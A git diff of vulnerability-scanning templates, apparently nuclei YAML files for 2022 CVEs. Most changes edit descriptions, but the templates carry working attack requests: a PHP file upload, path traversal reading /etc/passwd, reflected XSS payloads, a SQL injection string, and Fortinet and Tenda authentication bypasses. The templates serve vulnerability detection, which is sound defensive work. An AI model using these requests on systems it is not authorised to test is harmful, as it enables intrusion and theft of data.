POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
Host: {{Hostname}}
Content-Length: 253
Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
Connection: close
-----------------------------7816508136577551742878603990
Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
Content-Type: text/html
<?php
echo "File Upload success";
-----------------------------7816508136577551742878603990--
- |
GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 302"
- "status_code_2 == 200"
- "contains(body_2, 'File Upload success')"
condition: and
# Enhanced by md on 2022/10/20

8
cves/2022/CVE-2022-1768.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2022-1768
info:
name: RSVPMaker WordPress plugin <= 9.3.2 - SQL Injection
name: WordPress RSVPMaker <=9.3.2 - SQL Injection
author: edoardottt
severity: high
description: |
The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to insufficient escaping and parameterization on user supplied data passed to multiple SQL queries in the ~/rsvpmaker-email.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to, and including, 9.3.2.
WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc
- https://wordpress.org/plugins/rsvpmaker/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1768
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2725322%40rsvpmaker&new=2725322%40rsvpmaker&sfp_email=&sfph_mail=
- https://nvd.nist.gov/vuln/detail/CVE-2022-1768
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -49,3 +49,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/12

6
cves/2022/CVE-2022-1910.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-1910
info:
name: Shortcodes and extra features for Phlox theme < 2.9.8 - Cross-Site-Scripting
name: WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
- https://wordpress.org/plugins/auxin-elements/
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

45
cves/2022/CVE-2022-22242.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2022-22242
info:
name: Juniper Web Device Manager - Cross-Site Scripting
author: EvergreenCartoons
severity: medium
description: |
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web
reference:
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
- https://kb.juniper.net/JSA69899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-22242
cwe-id: CWE-79
metadata:
shodan-query: title:"Juniper Web Device Manager"
verified: "true"
tags: cve,cve2022,xss,juniper,junos
requests:
- method: GET
path:
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "The requested resource is not authorized to view"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

6
cves/2022/CVE-2022-2467.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-2467
info:
name: SourceCodester Garage Management System 1.0 - SQL Injection
name: Garage Management System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
A vulnerability has been found in SourceCodester Garage Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument username with the input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md
- https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
@ -43,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

54
cves/2022/CVE-2022-28290.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2022-28290
info:
name: Country Selector < 1.6.6 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape the country and lang parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479
- https://nvd.nist.gov/vuln/detail/CVE-2022-28290
- https://cybersecurityworks.com/zerodays/cve-2022-28290-reflected-cross-site-scripting-in-welaunch.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-28290
cwe-id: CWE-79
tags: wordpress-country-selector,wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
country=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US
skip-variables-check: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>'
- 'country_selector_'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

58
cves/2022/CVE-2022-2863.yaml Normal file
View File

@ -0,0 +1,58 @@
id: CVE-2022-2863
info:
name: WordPress WPvivid Backup < 0.9.76 - Local File Inclusion
author: tehtbl
severity: medium
description: The plugin does not sanitise and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server via a Traversal attack.
reference:
- https://seclists.org/fulldisclosure/2022/Oct/0
- https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2863
- http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html
remediation: Upgrade to version 0.9.76 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2022-2863
cwe-id: CWE-22
tags: wp,wpscan,seclists,packetstorm,authenticated,cve,cve2022,lfi,wordpress,wp-plugin
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=WPvivid HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '"_ajax_nonce":"([0-9a-z]+)"'
internal: true

8
cves/2022/CVE-2022-29272.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2022-29272
info:
name: Nagios XI < 5.8.5 - Open Redirect
name: Nagios XI <5.8.5 - Open Redirect
author: ritikchaddha
severity: medium
description: |
In Nagios XI through 5.8.5, an open redirect vulnerability exists in the login function that could lead to spoofing.
Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272
- https://nvd.nist.gov/vuln/detail/CVE-2022-29272
- https://github.com/4LPH4-NL/CVEs
- https://github.com/sT0wn-nl/CVEs/blob/master/README.md#nagios-xi
- https://nvd.nist.gov/vuln/detail/CVE-2022-29272
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -48,3 +48,5 @@ requests:
regex:
- '<input type="hidden" name="nsp" value="(.*)">'
- "<input type='hidden' name='nsp' value='(.*)'>"
# Enhanced by md on 2022/10/14

8
cves/2022/CVE-2022-29775.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2022-29775
info:
name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication
name: iSpy 7.2.2.0 - Authentication Bypass
author: arafatansari
severity: critical
description: |
iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
- https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-29775
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
- https://nvd.nist.gov/vuln/detail/CVE-2022-29775
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -44,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/19

7
cves/2022/CVE-2022-30512.yaml
View File

@ -5,12 +5,11 @@ info:
author: tess
severity: critical
description: |
School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/payment_history.php:31.
School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/bigzooooz/CVE-2022-30512
- https://nvd.nist.gov/vuln/detail/CVE-2022-30512
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-3051
- https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-30512
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -43,3 +42,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

8
cves/2022/CVE-2022-30513.yaml
View File

@ -1,17 +1,15 @@
id: CVE-2022-30513
info:
name: School Dormitory Management - Authenticated XSS
name: School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting
author: tess
severity: medium
description: |
School Dormitory Management System v1.0 is vulnerable to reflected
cross-site scripting (XSS) via admin/inc/navigation.php:125
School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/bigzooooz/CVE-2022-30513
- https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-30513
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30513
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -49,3 +47,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

8
cves/2022/CVE-2022-30514.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2022-30514
info:
name: School Dormitory Management - Authenticated XSS via "s=" parameter
name: School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting
author: tess
severity: medium
description: |
School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:125
School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability in admin/inc/navigation.php:126. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/bigzooooz/CVE-2022-30514
- https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-30514
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30514
- https://nvd.nist.gov/vuln/detail/CVE-2022-30514
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -48,3 +48,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

2
cves/2022/CVE-2022-31814.yaml
View File

@ -16,7 +16,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-31814
metadata:
verified: true
verified: "true"
tags: cve,cve2022,pfsense,pfblockerng,rce,oast
requests:

41
cves/2022/CVE-2022-33901.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2022-33901
info:
name: MultiSafepay plugin for WooCommerce <= 4.13.1 - Unauthenticated Arbitrary File Read
author: theamanrawat
severity: high
description: |
Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.
reference:
- https://wordpress.org/plugins/multisafepay/
- https://nvd.nist.gov/vuln/detail/CVE-2022-33901
- https://wordpress.org/plugins/multisafepay/#developers
- https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-33901
metadata:
verified: "true"
tags: cve,cve2022,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200

8
cves/2022/CVE-2022-35914.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2022-35914
info:
name: GLPI - Remote Code Execution
name: GLPI <=10.0.2 - Remote Command Execution
author: For3stCo1d
severity: critical
description: |
/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.
GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
reference:
- https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914
- https://github.com/cosad3s/CVE-2022-35914-poc
- https://nvd.nist.gov/vuln/detail/CVE-2022-35914
- http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
- https://nvd.nist.gov/vuln/detail/CVE-2022-35914
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -44,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

8
cves/2022/CVE-2022-38553.yaml
View File

@ -1,16 +1,16 @@
id: CVE-2022-38553
info:
name: Academy Learning Management System < v5.9.1 - Reflected XSS
name: Academy Learning Management System <5.9.1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
- https://github.com/4websecurity/CVE-2022-38553
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
- https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -43,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/18

44
cves/2022/CVE-2022-38870.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-38870
info:
name: Free5gc - Information disclosure
author: For3stCo1d
severity: high
description: |
Free5gc v3.2.1 is vulnerable to Information disclosure.
reference:
- https://github.com/free5gc/free5gc/issues/387
- https://nvd.nist.gov/vuln/detail/CVE-2022-38870
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-38870
cwe-id: CWE-306
metadata:
shodan-query: http.title:"free5GC Web Console"
tags: cve,cve2022,free5gc,exposure
requests:
- raw:
- |
GET /api/subscriber HTTP/1.1
Host: {{Hostname}}
Token: admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"plmnID":'
- '"ueId":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

8
cves/2022/CVE-2022-40083.yaml
View File

@ -1,13 +1,15 @@
id: CVE-2022-40083
info:
name: Labstack Echo < v4.9.0 - Open Redirect
name: Labstack Echo 4.8.0 - Open Redirect
author: pdteam
severity: critical
description: |
Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).
Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Download and install 4.9.0, which contains a patch for this issue.
reference:
- https://github.com/labstack/echo/issues/2259
- https://nvd.nist.gov/vuln/detail/CVE-2022-40083
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6
@ -30,3 +32,5 @@ requests:
- type: status
status:
- 301
# Enhanced by md on 2022/10/18

17
cves/2022/CVE-2022-40684.yaml
View File

@ -1,19 +1,22 @@
id: CVE-2022-40684
info:
name: Fortigate - Authentication bypass
name: Fortinet - Authentication Bypass
author: Shockwave,nagli,carlosvieira
severity: critical
description: |
Enables an unauthenticated remote attacker to use administrative interfaces by sending specially crafted HTTP or HTTPS requests, allowing them to log in to various products of Fortinet that are unpatched.
Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
- https://nvd.nist.gov/vuln/detail/CVE-2022-40684
classification:
cvss-score: 9.6
cve-id: CVE-2022-27593
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-40684
cwe-id: CWE-306
tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev
requests:
@ -33,8 +36,8 @@ requests:
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610
{
"ssh-public-key1":"{{randstr}}"
{
"ssh-public-key1":"{{randstr}}"
}
stop-at-first-match: true
@ -54,3 +57,5 @@ requests:
- 'Invalid SSH public key.'
- 'cli_error'
condition: and
# Enhanced by md on 2022/10/19

43
cves/2022/CVE-2022-40879.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2022-40879
info:
name: kkFileView 4.1.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the parameter 'errorMsg.'
reference:
- https://github.com/kekingcn/kkFileView/issues/389
- https://nvd.nist.gov/vuln/detail/CVE-2022-40879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29349
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.html:"kkFileView"
tags: cve,cve2022,kkFileView,xss
requests:
- method: GET
path:
- "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=1 onerror=alert(document.domain)>=PQ</p>'
- '该文件不'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

45
cves/2022/CVE-2022-41473.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2022-41473
info:
name: RPCMS 3.0.2 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
RPCMS 3.0.2 contains a cross-site scripting vulnerability in the Search function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/ralap-z/rpcms/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2022-41473
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-41473
cwe-id: CWE-79
metadata:
shodan-query: http.html:"RPCMS"
verified: "true"
tags: cve,cve2022,rpcms,xss
requests:
- method: GET
path:
- "{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'rpcms'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2022/10/18

36
cves/2022/CVE-2022-41840.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2022-41840
info:
name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
author: theamanrawat
severity: high
reference:
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
- https://wordpress.org/plugins/usc-e-shop/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
classification:
cve-id: CVE-2022-41840
metadata:
verified: true
tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

47
cves/2022/CVE-2022-42233.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2022-42233
info:
name: Tenda 11N - Authentication Bypass
author: For3stCo1d
severity: critical
description: |
Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability.
reference:
- https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-42233
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-42233
cwe-id: CWE-287
metadata:
fofa-query: product=="Tenda-11N-Wireless-AP"
shodan-query: http.title:"Tenda 11N"
verified: "true"
tags: cve,cve2022,tenda,auth-bypass,router,iot
requests:
- raw:
- |
GET /index.asp HTTP/1.1
Host: {{Hostname}}
Cookie: admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'def_wirelesspassword'
- 'Tenda 11N'
condition: and
case-insensitive: true
- type: word
part: header
words:
- 'GoAhead-Webs'
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff Show More